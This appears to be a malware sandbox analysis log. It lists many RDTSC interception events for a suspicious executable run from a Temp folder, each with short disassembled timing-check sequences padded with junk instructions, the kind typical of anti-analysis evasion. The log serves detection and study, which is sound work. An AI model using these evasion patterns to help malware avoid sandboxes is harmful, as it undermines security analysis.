                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A2F0EA second address: A2F0EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A2F0EE second address: A2F0F8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F73D4D0E046h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A2F0F8 second address: A2F104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A3283B second address: A3283F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A3283F second address: A3286F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F73D4C57606h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F73D4C5760Fh 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F73D4C57612h 0x00000019 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A3286F second address: A32887 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F73D4D0E053h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A32887 second address: A3288D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A3288D second address: A328B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F73D4D0E059h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A328B1 second address: A328B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A32C65 second address: A32C92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F73D4D0E058h 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F73D4D0E04Dh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A32C92 second address: A32C96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A32E2D second address: A32E33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A39338 second address: A39346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jg 00007F73D4C57606h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A39346 second address: A39362 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F73D4D0E052h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A39362 second address: A3937F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F73D4C57606h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F73D4C5760Ah 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A3937F second address: A393B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E051h 0x00000007 jns 00007F73D4D0E046h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F73D4D0E057h 0x00000016 jl 00007F73D4D0E046h 0x0000001c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A393B9 second address: A393BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A393BD second address: A393C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A397BC second address: A397C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A397C2 second address: A397DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F73D4D0E057h 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A397DE second address: A397E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A397E6 second address: A397EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A39E11 second address: A39E1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F73D4C57606h 0x0000000d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A39E1E second address: A39E24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A39E24 second address: A39E29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A39E29 second address: A39E31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A39E31 second address: A39E42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jbe 00007F73D4C5760Eh 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A3A727 second address: A3A757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F73D4D0E053h 0x00000009 jmp 00007F73D4D0E058h 0x0000000e popad 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A3A757 second address: A3A75E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A3A9FE second address: A3AA03 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A3AA03 second address: A3AA0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A3AA0F second address: A3AA13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A3AD16 second address: A3AD2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73D4C57610h 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A4424C second address: A4426A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E058h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A4426A second address: A44285 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C57615h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A44285 second address: A44289 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A443CA second address: A443DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F73D4C5760Dh 0x0000000c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A443DE second address: A443F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F73D4D0E054h 0x0000000b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A44960 second address: A44987 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C57617h 0x00000007 jo 00007F73D4C57612h 0x0000000d jp 00007F73D4C57606h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A44AB5 second address: A44AE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E052h 0x00000007 jmp 00007F73D4D0E056h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A44AE6 second address: A44AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A44C53 second address: A44C57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A4D270 second address: A4D275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A4BAF8 second address: A4BB0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F73D4D0E046h 0x00000010 jnp 00007F73D4D0E046h 0x00000016 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A4C091 second address: A4C0B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F73D4C57617h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A4C213 second address: A4C217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A57C36 second address: A57C62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F73D4C57606h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jbe 00007F73D4C5761Ch 0x00000012 push edx 0x00000013 pop edx 0x00000014 jmp 00007F73D4C57614h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A57C62 second address: A57C66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A5792E second address: A57932 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A57932 second address: A5797C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F73D4D0E055h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F73D4D0E04Bh 0x00000010 jbe 00007F73D4D0E060h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A5797C second address: A57980 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A64E72 second address: A64E78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A64E78 second address: A64E7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A64E7E second address: A64E82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A64A2B second address: A64A50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 jmp 00007F73D4C5760Fh 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 jng 00007F73D4C57606h 0x00000018 push esi 0x00000019 pop esi 0x0000001a pop esi 0x0000001b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A64A50 second address: A64A62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73D4D0E04Eh 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A64A62 second address: A64A6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A64A6C second address: A64A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A744E2 second address: A744E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A794EA second address: A794FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F73D4D0E048h 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A83536 second address: A83554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F73D4C5760Bh 0x0000000b jmp 00007F73D4C5760Dh 0x00000010 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A83554 second address: A8355A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A8355A second address: A83560 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A82174 second address: A8217A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A8217A second address: A82180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A82180 second address: A82187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A82187 second address: A821CF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F73D4C57617h 0x00000008 pop edx 0x00000009 pushad 0x0000000a jne 00007F73D4C57606h 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F73D4C5760Eh 0x00000017 jng 00007F73D4C57606h 0x0000001d popad 0x0000001e pop edx 0x0000001f pop eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F73D4C5760Bh 0x00000027 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A821CF second address: A821D4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A821D4 second address: A821DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A83296 second address: A8329C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A8329C second address: A832A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A832A0 second address: A832AA instructions: 0x00000000 rdtsc 0x00000002 ja 00007F73D4D0E04Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A8503D second address: A85066 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C57619h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jo 00007F73D4C57606h 0x00000015 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A89679 second address: A89691 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007F73D4D0E04Dh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A89691 second address: A896AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F73D4C57611h 0x0000000e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A9DDD3 second address: A9DDE9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F73D4D0E046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jns 00007F73D4D0E04Ch 0x00000010 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: AA9DD6 second address: AA9DDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: AA9DDC second address: AA9DE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: AA9DE0 second address: AA9E02 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F73D4C57618h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: AA9E02 second address: AA9E06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: AADF2F second address: AADF63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C57618h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jnp 00007F73D4C57606h 0x00000010 pushad 0x00000011 popad 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F73D4C5760Ch 0x0000001a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: AADF63 second address: AADF96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E059h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a je 00007F73D4D0E05Fh 0x00000010 jmp 00007F73D4D0E04Bh 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: AADF96 second address: AADF9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 98C5C1 second address: 98C5C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 98C5C5 second address: 98C5F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C57618h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jmp 00007F73D4C5760Dh 0x00000011 pop ecx 0x00000012 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 98C5F2 second address: 98C5FE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: AADC7F second address: AADC9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F73D4C57616h 0x0000000d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: AADC9D second address: AADCA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: AADCA3 second address: AADCA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: AADCA7 second address: AADCB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: AADCB3 second address: AADCB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: AC887B second address: AC8899 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F73D4D0E058h 0x0000000b rdtsc
